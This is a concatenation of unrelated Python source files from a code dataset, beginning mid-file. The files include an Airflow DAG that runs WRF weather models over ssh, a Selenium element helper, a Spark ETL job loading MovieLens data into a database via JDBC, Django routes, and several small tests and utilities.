np.memmap(path, mode='r', shape=event_data_shape,\n offset=event_data_offset, dtype=event_data_dtype)\n self.labels = np.array(hdf5_labels)\n\n def __getitem__(self, idx):\n x = torch.from_numpy(self.point_clouds[idx][:, self.cols_to_include]/np.array([100,100,100,1]))\n x = x.float()\n y = torch.tensor([self.labels[idx]], dtype=torch.int64)\n \n return x.to(self.device), y.to(self.device)\n\n def __len__(self):\n return self.labels.shape[0]\n\n\n\n \n\n","sub_path":"pointnet/io_util/dataset2_kn.py","file_name":"dataset2_kn.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"593617883","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'PrayerWall'\nurlpatterns = [\n url(r'^$', views.prayerWall, name=\"PrayerWall\"),\n url(r'^addnewprayerpage/$', views.addNewPrayerPage, name=\"AddNewPrayerPage\"),\n url(r'^addnewprayeraction/$', views.addNewPrayer, name=\"AddNewPrayer\"),\n url(r'^numprayedplusone/(?P[0-9]+)/$', views.numPrayedPlusOne, name=\"NumPrayedPlusOne\")\n]\n","sub_path":"PrayerWall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575910522","text":"from datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.models import Variable\nimport sys\nimport subprocess\nimport zlib\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/local_dss_workflow/plugins/operators')\nfrom gfs_sensor import GfsSensorOperator\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/db_util')\nfrom dss_db import RuleEngineAdapter\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/accuracy_unit/wrf')\nfrom wrf_accuracy import calculate_wrf_rule_accuracy\n\nsys.path.insert(0, '/home/curw/git/DSS-Framework/weather_models/wrf')\nfrom model_definition import get_namelist_wps_config, get_namelist_input_config\n\nprod_dag_name = 'wrf_4.1.2_A_dag'\ndag_pool = 'wrf_pool'\n\ndefault_args = {\n 'owner': 'dss admin',\n 'start_date': datetime.utcnow(),\n 'email': ['hasithadkr7@gmail.com'],\n 'email_on_failure': True,\n}\n\nssh_cmd_template = \"ssh -i /home/curw/.ssh/curw -o \\\"StrictHostKeyChecking no\\\" curw@{} \" \\\n \"\\'bash -c \\\"{}\\\"'\"\n\n\ndef get_dss_db_adapter():\n adapter = None\n try:\n db_config = Variable.get('db_config', deserialize_json=True)\n try:\n adapter = RuleEngineAdapter.get_instance(db_config)\n except Exception as ex:\n print('get_dss_db_adapter|db_adapter|Exception: ', str(ex))\n except Exception as e:\n print('get_dss_db_adapter|db_config|Exception: ', str(e))\n return adapter\n\n\ndef get_push_command(**context):\n wrf_rule = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('get_wrf_run_command|wrf_rule : ', wrf_rule)\n wrf_model = wrf_rule['model']\n wrf_run = wrf_rule['rule_info']['run']\n gfs_hour = wrf_rule['rule_info']['hour']\n print('get_wrf_run_command|rule_details: ', wrf_rule['rule_info']['rule_details'])\n push_node = wrf_rule['rule_info']['rule_details']['push_node']\n bash_script = wrf_rule['rule_info']['rule_details']['push_script']\n push_config = wrf_rule['rule_info']['rule_details']['push_config']\n wrf_bucket = wrf_rule['rule_info']['rule_details']['wrf_bucket']\n exec_date = datetime.strptime(context[\"execution_date\"].to_datetime_string(), '%Y-%m-%d %H:%M:%S')\n exec_date = exec_date.strftime('%Y-%m-%d')\n push_script = '{} {} {} d{} {} {} {}'.format(bash_script, push_config, wrf_bucket, wrf_run,\n gfs_hour, wrf_model, exec_date)\n print('get_push_command|run_script : ', push_script)\n push_wrf4_A_cmd = ssh_cmd_template.format(push_node, push_script)\n print('get_push_command|push_wrf4_A_cmd : ', push_wrf4_A_cmd)\n subprocess.call(push_wrf4_A_cmd, shell=True)\n\n\ndef get_wrf_run_command(**context):\n wrf_rule = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('get_wrf_run_command|wrf_rule : ', wrf_rule)\n wrf_model = wrf_rule['model']\n wrf_version = wrf_rule['version']\n wrf_run = wrf_rule['rule_info']['run']\n gfs_hour = wrf_rule['rule_info']['hour']\n namelist_wps_id = wrf_rule['rule_info']['namelist_wps']\n namelist_input_id 
= wrf_rule['rule_info']['namelist_input']\n print('get_wrf_run_command|rule_details: ', wrf_rule['rule_info']['rule_details'])\n run_node = wrf_rule['rule_info']['rule_details']['run_node']\n run_script = wrf_rule['rule_info']['rule_details']['run_script']\n namelist_wps_template = wrf_rule['rule_info']['rule_details']['namelist_wps_template']\n namelist_input_template = wrf_rule['rule_info']['rule_details']['namelist_input_template']\n exec_date = context[\"execution_date\"].to_datetime_string()\n dss_adapter = get_dss_db_adapter()\n if dss_adapter is not None:\n wps_content = get_namelist_wps_config(dss_adapter, namelist_wps_id, namelist_wps_template)\n if wps_content is not None:\n zipped_wps_content = zlib.compress(wps_content.encode())\n input_content = get_namelist_input_config(dss_adapter, namelist_input_id, namelist_input_template)\n if input_content is not None:\n zipped_input_content = zlib.compress(input_content.encode())\n run_script = '{} -r {} -m {} -v {} -h {} -d {} -a {} -b {}'.format(run_script, wrf_run,\n wrf_model, wrf_version,\n gfs_hour, exec_date,\n zipped_wps_content,\n zipped_input_content)\n print('get_wrf_run_command|run_script : ', run_script)\n run_wrf4_A_cmd = ssh_cmd_template.format(run_node, run_script)\n print('get_wrf_run_command|run_wrf4_A_cmd : ', run_wrf4_A_cmd)\n subprocess.call(run_wrf4_A_cmd, shell=True)\n\n\ndef update_workflow_status(status, rule_id):\n try:\n db_config = Variable.get('db_config', deserialize_json=True)\n try:\n adapter = RuleEngineAdapter.get_instance(db_config)\n adapter.update_rule_status_by_id('wrf', rule_id, status)\n except Exception as ex:\n print('update_workflow_status|db_adapter|Exception: ', str(ex))\n except Exception as e:\n print('update_workflow_status|db_config|Exception: ', str(e))\n\n\ndef get_rule_id(context):\n rule_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')['rule_info']\n if rule_info:\n rule_id = rule_info['id']\n print('get_rule_id|rule_id : ', rule_id)\n return rule_id\n else:\n return None\n\n\ndef set_running_status(**context):\n rule_id = get_rule_id(context)\n print('set_running_status :', )\n if rule_id is not None:\n update_workflow_status(2, rule_id)\n else:\n print('set_running_status|rule_id not found')\n\n\ndef set_complete_status(**context):\n rule_id = get_rule_id(context)\n if rule_id is not None:\n update_workflow_status(3, rule_id)\n else:\n print('set_complete_status|rule_id not found')\n\n\ndef run_this_func(dag_run, **kwargs):\n print('run_this_func|dag_run : ', dag_run)\n wrf_rule = {'model': 'A', 'version': '4.1.2', 'rule_info': dag_run.conf}\n print('run_this_func|wrf_rule : ', wrf_rule)\n return wrf_rule\n\n\ndef check_accuracy(**context):\n print('check_accuracy|context : ', context)\n task_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')\n print('check_accuracy|task_info : ', task_info)\n rule_info = context['task_instance'].xcom_pull(task_ids='init_wrfv4A')['rule_info']\n print('check_accuracy|rule_info : ', rule_info)\n accuracy_rule_id = rule_info['accuracy_rule']\n if accuracy_rule_id == 0 or accuracy_rule_id == '0':\n return True\n else:\n wrf_rule = {'model': 'A', 'version': '4.1.2', 'rule_info': rule_info}\n print('check_accuracy|wrf_rule : ', wrf_rule)\n exec_date = context[\"execution_date\"].to_datetime_string()\n print('check_accuracy|exec_date : ', wrf_rule)\n return calculate_wrf_rule_accuracy(wrf_rule, exec_date)\n\n\ndef on_dag_failure(context):\n rule_id = get_rule_id(context)\n if rule_id is not None:\n update_workflow_status(4, 
rule_id)\n print('on_dag_failure|set error status for rule|rule_id :', rule_id)\n else:\n print('on_dag_failure|rule_id not found')\n\n\nwith DAG(dag_id=prod_dag_name, default_args=default_args, schedule_interval=None,\n description='Run WRF v4 A DAG', dagrun_timeout=timedelta(hours=9), catchup=False,\n on_failure_callback=on_dag_failure, max_active_runs=2, concurrency=2) as dag:\n init_wrfv4_A = PythonOperator(\n task_id='init_wrfv4A',\n provide_context=True,\n python_callable=run_this_func,\n pool=dag_pool\n )\n\n running_state_wrfv4A = PythonOperator(\n task_id='running_state_wrfv4A',\n provide_context=True,\n python_callable=set_running_status,\n pool=dag_pool\n )\n\n check_gfs_availability_wrfv4A = GfsSensorOperator(\n task_id='check_gfs_availability_wrfv4A',\n poke_interval=60,\n execution_timeout=timedelta(minutes=45),\n params={'model': 'A', 'init_task_id': 'init_wrfv4A'},\n provide_context=True,\n pool=dag_pool\n )\n\n run_wrf4_A = PythonOperator(\n task_id='run_wrf4_A',\n provide_context=True,\n execution_timeout=timedelta(hours=8, minutes=30),\n python_callable=get_wrf_run_command,\n pool=dag_pool\n )\n\n wrf_data_push_wrfv4A = PythonOperator(\n task_id='wrf_data_push_wrfv4A',\n provide_context=True,\n python_callable=get_push_command,\n pool=dag_pool\n )\n\n check_accuracy_wrfv4A = PythonOperator(\n task_id='check_accuracy_wrfv4A',\n provide_context=True,\n python_callable=check_accuracy,\n pool=dag_pool\n )\n\n complete_state_wrfv4A = PythonOperator(\n task_id='complete_state_wrfv4A',\n provide_context=True,\n python_callable=set_complete_status,\n pool=dag_pool\n )\n\n init_wrfv4_A >> running_state_wrfv4A >> check_gfs_availability_wrfv4A >> \\\n run_wrf4_A >> wrf_data_push_wrfv4A >> check_accuracy_wrfv4A >> complete_state_wrfv4A\n","sub_path":"local_dss_workflow/dags/wrf/wrf_4.1.2_A.py","file_name":"wrf_4.1.2_A.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343011237","text":"import datetime\nimport shutil\nimport os\n# import automagica.activities as all_method\nimport sys\nimport time\nimport base64\nsys.path.append('..')\nsys.path.append('.')\nsys.path.append('../')\nsys.path.append('..')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\noptions = webdriver.ChromeOptions()\nchrome_options = options\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\ndic_for_window ={}\nimport pickle\n\nfrom env_variable import *\nimport binascii\nimport io\n\n'''\nThis script is fairly involved to invoke, so here are some demo calls for reference:\n-p id \\\"sb_form_q\\\" send_keys(\\\"abc\\\")\n-p id \\\"sb_form_q\\\" get_attribute(\\\"id\\\")\n-p id \\\"sb_form_q\\\" get_property(\\\"id\\\")\n-p id \\\"sb_form_q\\\" text\n'''\ntry:\n\n import argparse\n# invocation demo: first argument: xpath|class_name|link_text|partial_link_text|name|tag_name|id|css_selector\n # second argument \"aaa\" # the value for the first argument ===========\n # third argument 'send_keys(\\\"abc\\\")'|click()|get_attribute(\"id\")\n # id \\\"sb_form_q\\\" send_keys(\\\"abc\\\")\n parser = argparse.ArgumentParser()\n parser.add_argument( \"-p\", type=str,nargs='+')\n args = parser.parse_args()\n if not args.p:\n args.p=\"f\"\n # print(args.url)\n # print(11111111)\n\n # \"dic_for_window[{}]={}\\n\".format(\"browser.title\", \"browser.current_window_handle\"),\n # browser='''\n\n 
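# create_driver launches a fresh Chrome and pickles its session id and command\n # executor URL, so that a later run can re-attach to the same browser through\n # webdriver.Remote instead of opening a new one.\n 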
def create_driver():\n driver = webdriver.Chrome(options=chrome_options)\n with open(session_file, 'wb') as f:\n params = {\"session_id\": driver.session_id, \"server_url\": driver.command_executor._url}\n pickle.dump(params, f)\n driver.get(args.url)\n return driver\n\n#============================== below is the per-action chrome logic.\n if not os.path.exists(session_file):\n raise FileNotFoundError(session_file)\n else:\n with open(session_file, 'rb') as f:\n params = pickle.load(f)\n try:\n options = webdriver.ChromeOptions()\n options.add_argument(\"headless\")\n driver = webdriver.Remote(command_executor=params[\"server_url\"],options=options)\n driver.quit() # quit the blank browser that start_session opened\n driver.session_id = params[\"session_id\"]\n # driver.execute_script('window.open(\"\");')\n # driver.get(args.url)\n\n#================ the handling code goes here.\n act=args.p\n aaa='driver.find_element_by_'+act[0]+\"(\"+act[1]+\")\"+'.'+act[2]\n data=eval('driver.find_element_by_'+act[0]+\"(\"+act[1]+\")\"+'.'+act[2])\n # driver.switch_to.active_element.send_keys(args.p)\n # driver.close()\n # driver.switch_to.window(driver.window_handles[-1])\n except:\n raise\n if data:\n import json\n a=json.dumps({'code':0,\"msg\":data},ensure_ascii=False)\n else:\n import json\n a=json.dumps({'code':0,\"msg\":'success'},ensure_ascii=False)\n\n print(a)\n\n\n\n\n\nexcept:\n print(\"{'code':'1','msg':'fault'}\")\n\n","sub_path":"yolov4_newest_custom_data/browser_find_element_and_do_something.py","file_name":"browser_find_element_and_do_something.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"6945038","text":"from pyspark.sql import SparkSession\r\nfrom pyspark.sql import functions as func\r\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, LongType\r\nfrom pyspark.sql.window import *\r\nimport argparse\r\n\r\n\r\n\r\nspark = SparkSession.builder.appName(\"ml-100k\").getOrCreate()\r\n\r\nocupaschema = StructType([StructField(\"Occupation\", StringType(),True)])\r\n\r\ngenreschema = StructType([\\\r\n StructField(\"Genre\", StringType(),True), \\\r\n])\r\n\r\nuserschema = StructType([\\\r\n StructField(\"id\", IntegerType(), True), \\\r\n StructField(\"Age\", IntegerType(), True), \\\r\n StructField(\"Gender\", StringType(), True), \\\r\n StructField(\"Occupation\", StringType(), True),\\\r\n StructField(\"Zipcode\", StringType(), True)])\r\n\r\nitenschema = StructType([\\\r\n StructField(\"id\", IntegerType(), True), \\\r\n StructField(\"Name\", StringType(), True), \\\r\n StructField(\"Date\", StringType(), True), \\\r\n StructField(\"Null\", StringType(), True), \\\r\n StructField(\"Link\", StringType(), True),\\\r\n StructField(\"unknown\", IntegerType(), True), \\\r\n StructField(\"Action\", IntegerType(), True), \\\r\n 
StructField(\"Adventure\", IntegerType(), True), \\\r\n StructField(\"Animation\", IntegerType(), True), \\\r\n StructField(\"Childrens\", IntegerType(), True), \\\r\n StructField(\"Comedy\", IntegerType(), True), \\\r\n StructField(\"Crime\", IntegerType(), True), \\\r\n StructField(\"Documentary\", IntegerType(), True), \\\r\n StructField(\"Drama\", IntegerType(), True), \\\r\n StructField(\"Fantasy\", IntegerType(), True), \\\r\n StructField(\"FilmNoir\", IntegerType(), True), \\\r\n StructField(\"Horror\", IntegerType(), True), \\\r\n StructField(\"Musical\", IntegerType(), True), \\\r\n StructField(\"Mystery\", IntegerType(), True), \\\r\n StructField(\"Romance\", IntegerType(), True), \\\r\n StructField(\"SciFi\", IntegerType(), True), \\\r\n StructField(\"Thriller\", IntegerType(), True), \\\r\n StructField(\"War\", IntegerType(), True), \\\r\n StructField(\"Western\", IntegerType(), True)])\r\n\r\nmoviexgenreschema = StructType([\\\r\n StructField(\"Movie_id\", IntegerType(), True), \\\r\n StructField(\"Genre_id\", IntegerType(), True)\r\n])\r\n\r\nscoreschema = StructType([\\\r\n StructField(\"User_id\", IntegerType(), True), \\\r\n StructField(\"Movie_id\", IntegerType(), True), \\\r\n StructField(\"Rating\", IntegerType(), True), \\\r\n StructField(\"Timestamp\", LongType(), True)\r\n])\r\n\r\n\r\n\r\noccupation = spark.read.schema(ocupaschema).csv(\"file:///ml-100k/u.occupation\")\r\n\r\nGenre = spark.read.option(\"sep\",\"|\").schema(genreschema).csv(\"file:///ml-100k/u.genre\")\r\n\r\nuser = spark.read.option(\"sep\",\"|\").schema(userschema).csv(\"file:///ml-100k/u.user\")\r\n\r\nscore = spark.read.option(\"sep\", \"\\t\").schema(scoreschema).csv(\"file:///ml-100k/u.data\")\r\n\r\nitens = spark.read\\\r\n .option(\"sep\",\"|\")\\\r\n .option(\"charset\", \"ISO-8859-1\")\\\r\n .schema(itenschema).csv(\"file:///ml-100k/u.item\")\r\n\r\n#code that allow arguments to be passed when calling the script, they are used to access the database in which the data is going to be written in\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--url')\r\nparser.add_argument('--schema')\r\nparser.add_argument('--user')\r\nparser.add_argument('--password')\r\nargs = parser.parse_args()\r\n\r\n#uses the window module to create the colum id of the occupation table\r\nwindow = Window.orderBy(func.col(\"Occupation\"))\r\noccupation = occupation.withColumn('id', func.row_number().over(window))\r\n\r\n#uses the window module to create the colum id of the movie genre table\r\nwindow = Window.orderBy(func.col(\"Genre\"))\r\nGenre = Genre.withColumn('id', func.row_number().over(window))\r\n\r\n#create an alias to both dataframes, this will be usefull when whe join both and want to rename the id table that got joined\r\nuser = user.alias('user')\r\noccupation = occupation.alias('occupation')\r\n#the actual join code\r\nuser = user.join(occupation, on= 'occupation', how='left')\r\n#drop the occupation table as this is not useful here\r\nuser = user.drop('Occupation')\r\n#this select is used to rename the id that got joined from the occupation table, here is where the alias given to the dataframes are used\r\nuser = user.select(\r\n func.col(\"user.id\"),\r\n func.col(\"user.Age\"),\r\n func.col(\"user.Gender\"),\r\n func.col(\"user.Zipcode\"),\r\n func.col(\"occupation.id\").alias(\"Occupation_id\")\r\n)\r\n#uses a regular expression to replace the releases date that was in the movie name colum with an empty space\r\nitens = itens.withColumn('Name', func.regexp_replace(func.col(\"Name\"), 
r\"\\((\\d+[^()]+)\\)\", ''))\r\n\r\n\r\n\r\n#code that creates a dictionary for each movie id and its respective genres, the !=0 is used because the entrys that were not in the genre would be added to dictionary because of how the genre are stored in the original file\r\nditcAc = {row['id']:row['Action'] for row in itens.collect() if row['Action'] != 0}\r\nditcAd = {row['id']:row['Adventure'] for row in itens.collect() if row['Adventure'] != 0}\r\nditcAn = {row['id']:row['Animation'] for row in itens.collect() if row['Animation'] != 0}\r\nditcCh = {row['id']:row['Childrens'] for row in itens.collect() if row['Childrens'] != 0}\r\nditcCo = {row['id']:row['Comedy'] for row in itens.collect() if row['Comedy'] != 0}\r\nditcCr = {row['id']:row['Crime'] for row in itens.collect() if row['Crime'] != 0}\r\nditcDo = {row['id']:row['Documentary'] for row in itens.collect() if row['Documentary'] != 0}\r\nditcDr = {row['id']:row['Drama'] for row in itens.collect() if row['Drama'] != 0}\r\nditcFa = {row['id']:row['Fantasy'] for row in itens.collect() if row['Fantasy'] != 0}\r\nditcFi = {row['id']:row['FilmNoir'] for row in itens.collect() if row['FilmNoir'] != 0}\r\nditcHo = {row['id']:row['Horror'] for row in itens.collect() if row['Horror'] != 0}\r\nditcMu = {row['id']:row['Musical'] for row in itens.collect() if row['Musical'] != 0}\r\nditcMy = {row['id']:row['Mystery'] for row in itens.collect() if row['Mystery'] != 0}\r\nditcRo = {row['id']:row['Romance'] for row in itens.collect() if row['Romance'] != 0}\r\nditcSc = {row['id']:row['SciFi'] for row in itens.collect() if row['SciFi'] != 0}\r\nditcTh = {row['id']:row['Thriller'] for row in itens.collect() if row['Thriller'] != 0}\r\nditcWa = {row['id']:row['War'] for row in itens.collect() if row['War'] != 0}\r\nditcWe = {row['id']:row['Western'] for row in itens.collect() if row['Western'] != 0}\r\nditcUn = {row['id']:row['unknown'] for row in itens.collect() if row['unknown'] != 0}\r\n\r\n#replace the value of dictionary (which at this moment is 1) to the same as its id counterpart in the genre table!\r\nditcAc = {x: 1 for x in ditcAc}\r\nditcAd = {x: 2 for x in ditcAd}\r\nditcAn = {x: 3 for x in ditcAn}\r\nditcCh = {x: 4 for x in ditcCh}\r\nditcCo = {x: 5 for x in ditcCo}\r\nditcCr = {x: 6 for x in ditcCr}\r\nditcDo = {x: 7 for x in ditcDo}\r\nditcDr = {x: 8 for x in ditcDr}\r\nditcFa = {x: 9 for x in ditcFa}\r\nditcFi = {x: 10 for x in ditcFi}\r\nditcHo = {x: 11 for x in ditcHo}\r\nditcMu = {x: 12 for x in ditcMu}\r\nditcMy = {x: 13 for x in ditcMy}\r\nditcRo = {x: 14 for x in ditcRo}\r\nditcSc = {x: 15 for x in ditcSc}\r\nditcTh = {x: 16 for x in ditcTh}\r\nditcWa = {x: 17 for x in ditcWa}\r\nditcWe = {x: 18 for x in ditcWe}\r\nditcUn = {x: 19 for x in ditcUn}\r\n\r\n#creats a list using the dictionary created, thoses lists will be merged toghter to be used in the creation of the dataframe containing the genres that the movies are in\r\nliUn = list(ditcUn.items())\r\nliAc = list(ditcAc.items())\r\nliAd = list(ditcAd.items())\r\nliAn = list(ditcAn.items())\r\nliCh = list(ditcCh.items())\r\nliCr = list(ditcCr.items())\r\nliDo = list(ditcDo.items())\r\nliDr = list(ditcDr.items())\r\nliFa = list(ditcFa.items())\r\nliFi = list(ditcFi.items())\r\nliHo = list(ditcHo.items())\r\nliMu = list(ditcMu.items())\r\nliMy = list(ditcMy.items())\r\nliRo = list(ditcRo.items())\r\nliSc = list(ditcSc.items())\r\nliTh = list(ditcTh.items())\r\nliWa = list(ditcWa.items())\r\nliWe = list(ditcWe.items())\r\n\r\n#the code that merges the lists\r\nlisttodf = liUn + 
liAc + liAd + liAn + liCh + liCo + liCr + liDo + liDr + liFa + liFi + liHo + liMu + liMy + liRo + liSc + liTh + liWa + liWe\r\n# creates the dataframe using the finalized list and the 'moviexgenreschema' schema\r\nmoviexgenre = spark.createDataFrame(data =listtodf, schema = moviexgenreschema)\r\n# a simple window function to give the entries their respective ids\r\nwindow = Window.orderBy(func.col(\"Movie_id\"))\r\nmoviexgenre = moviexgenre.withColumn('id', func.row_number().over(window))\r\n\r\n# puts the id as the first item in the dataframe\r\nmoviexgenre = moviexgenre.select(\r\n func.col(\"id\"),\r\n func.col(\"Movie_id\"),\r\n func.col(\"Genre_id\")\r\n)\r\n# creates the movie dataframe from the itens dataframe; that dataframe contained a lot of data that is not used in the soon-to-be movie table, so we use a select to keep just the data we need\r\nmovie = itens.select(\r\n func.col(\"id\"),\r\n func.col(\"Name\"),\r\n func.col(\"Date\"),\r\n func.col(\"Link\").alias(\"IMDB_Url\")\r\n)\r\n# a simple window function to give the entries their respective ids\r\nwindow = Window.orderBy(func.col(\"timestamp\"))\r\nscore = score.withColumn('id', func.row_number().over(window))\r\n\r\n# this select converts the timestamp column, originally in unix time, to timestamp type\r\nscore = score.select(\r\n func.col(\"id\"),\r\n func.col(\"User_id\"),\r\n func.col(\"Movie_id\"),\r\n func.col(\"Rating\"),\r\n func.from_unixtime(func.col(\"timestamp\")).alias(\"Timestamp\")\r\n)\r\n# JDBC code to write to the database\r\n# the URL, SCHEMA, USER and PASSWORD are set by passing them as arguments when calling the script.\r\n#Example: spark-submit --driver-class-path C:\\ml100k\\postgresql-42.2.23.jar project.py --url jdbc:postgresql://localhost:5432/postgres --schema ml100k --user postgres --password admin\r\noccupation.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Occupation') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nGenre.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Genre') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nuser.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.User') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nmovie.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Movie') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nmoviexgenre.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.MoviexGenre') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n\r\nscore.write \\\r\n .format(\"jdbc\") \\\r\n .option(\"url\", args.url) \\\r\n .option(\"dbtable\", args.schema + '.Score') \\\r\n .option(\"user\", args.user) \\\r\n .option(\"password\", args.password) \\\r\n .mode (\"overwrite\") \\\r\n .save()\r\n","sub_path":"ml100k.py","file_name":"ml100k.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"314082519","text":"from unittest.mock import sentinel\n\nimport pytest\n\nfrom via.views.proxy import proxy\n\n\nclass TestProxy:\n @pytest.mark.parametrize(\n \"path,url_to_proxy\",\n [\n (\"/https://example.com/foo\", \"https://example.com/foo\"),\n (\"/http://example.com/foo\", \"http://example.com/foo\"),\n (\n \"/https://example.com/foo?bar=gar&har=jar#car\",\n \"https://example.com/foo?bar=gar&har=jar#car\",\n ),\n ],\n )\n def test_it(\n self, pyramid_request, path, url_to_proxy, get_url_details, via_client_service\n ):\n pyramid_request.path = path\n\n result = proxy(pyramid_request)\n\n get_url_details.assert_called_once_with(url_to_proxy)\n via_client_service.url_for.assert_called_once_with(\n url_to_proxy, sentinel.mime_type, pyramid_request.params\n )\n assert result == {\"src\": via_client_service.url_for.return_value}\n\n def test_it_normalizes_url(\n self, pyramid_request, get_url_details, via_client_service, url_from_user_input\n ):\n pyramid_request.path = \"/https://example.org\"\n url_from_user_input.side_effect = [\"https://normalized.com\"]\n\n proxy(pyramid_request)\n\n url_from_user_input.assert_called_with(\"https://example.org\")\n get_url_details.assert_called_once_with(\"https://normalized.com\")\n via_client_service.url_for.assert_called_once_with(\n \"https://normalized.com\", sentinel.mime_type, pyramid_request.params\n )\n\n @pytest.fixture(autouse=True)\n def get_url_details(self, patch):\n get_url_details = patch(\"via.views.proxy.get_url_details\")\n get_url_details.return_value = (sentinel.mime_type, sentinel.status_code)\n return get_url_details\n\n @pytest.fixture(autouse=True)\n def url_from_user_input(self, patch):\n url_from_user_input = patch(\"via.views.proxy.url_from_user_input\")\n url_from_user_input.side_effect = lambda url: url\n return url_from_user_input\n","sub_path":"tests/unit/via/views/proxy_test.py","file_name":"proxy_test.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184355615","text":"import subprocess as sp\nimport sys\nimport os\n\nfrom .bots import types\n\n\nclass Spawner:\n @staticmethod\n def spawn(types_to_spawn=types.ALL_QUERIES) -> '_RabbitConsumer':\n pids = []\n for t in types_to_spawn:\n pids.append(Spawner._start_subprocess(t))\n\n return pids\n\n @staticmethod\n def _start_subprocess(t):\n # Start consumer, pass type as parameter\n p = sp.Popen(\n ['python', '-m', 'bots.consumers', '-t', t],\n cwd=os.path.dirname(os.path.abspath(__file__)),\n stderr=sp.STDOUT,\n )\n\n # Display (or log?) 
PID for future kill\n print('Started consumer of type', t, 'with PID', p.pid)\n\n return p.pid\n\n\nif __name__ == '__main__':\n Spawner.spawn()\n\n # Ensure immediate smooth exit\n sys.exit(0)\n","sub_path":"query/spawner.py","file_name":"spawner.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127712342","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/6/25 18:02\n# @Author : Greens\n\n\n\"\"\"\n给你一根长度为n的绳子,请把绳子剪成整数长的m段(m、n都是整数,n>1并且m>1),\n每段绳子的长度记为k[1],...,k[m]。请问k[1]x...xk[m]可能的最大乘积是多少?\n例如,当绳子的长度是8时,我们把它剪成长度分别为2、3、3的三段,此时得到的最大乘积是18\n\"\"\"\n\n\nclass Solution:\n def cutRope(self, number):\n dp = [0 for _ in range(number + 1)]\n dp[1] = 1\n dp[2] = 1\n for i in range(3, number + 1):\n for j in range(2, i):\n dp[i] = max(dp[i], max(j * (i - j), j * dp[i - j]))\n print(dp)\n return dp[number]\n\n\nif __name__ == '__main__':\n my_class = Solution()\n my_class.cutRope(9)\n","sub_path":"code/2020_06/剪绳子.py","file_name":"剪绳子.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"628282782","text":"from vmwaremirage import VmwareMirageClient\nimport config\nimport config_secure\nimport os\n\n\nvm = VmwareMirageClient(server=config_secure.server,\n username=config_secure.username,\n password=os.environ['VMWARE_MIRAGE_PASSWORD'])\n\n\ndef test_reauth():\n # Cofirm we are working\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n # Logout\n vm.client.service.Logout()\n\n # And try again. It should automatically re-authenticate\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n\ndef test_get_cvds():\n # Test the by id function\n cvd = vm.get_cvd(config.cvd_1['id'])\n assert cvd.Name == config.cvd_1['name']\n\n # Test getting two cvds by id\n cvds = vm.get_cvds(by='ID', value=[config.cvd_1['id'],config.cvd_2['id']], query_type='EQUALS')\n assert len(cvds) == 2\n\n cvds = vm.get_cvds(by='DEVICE_ID', value=[config.cvd_1['deviceid'],config.cvd_2['deviceid']], query_type='EQUALS')\n assert len(cvds) == 2\n\n cvds = vm.get_cvds(by='POLICY_ID', value=config.cvd_1['policyid'], query_type='EQUALS')\n assert len(cvds) >= 1\n\n cvds = vm.get_cvds(by='NAME', value=config.cvd_1['name'])\n assert len(cvds) == 1\n\n cvds = vm.get_cvds(by='USER_NAME', value=config.cvd_1['username'], query_type='CONTAINS')\n assert len(cvds) >= 1\n\n 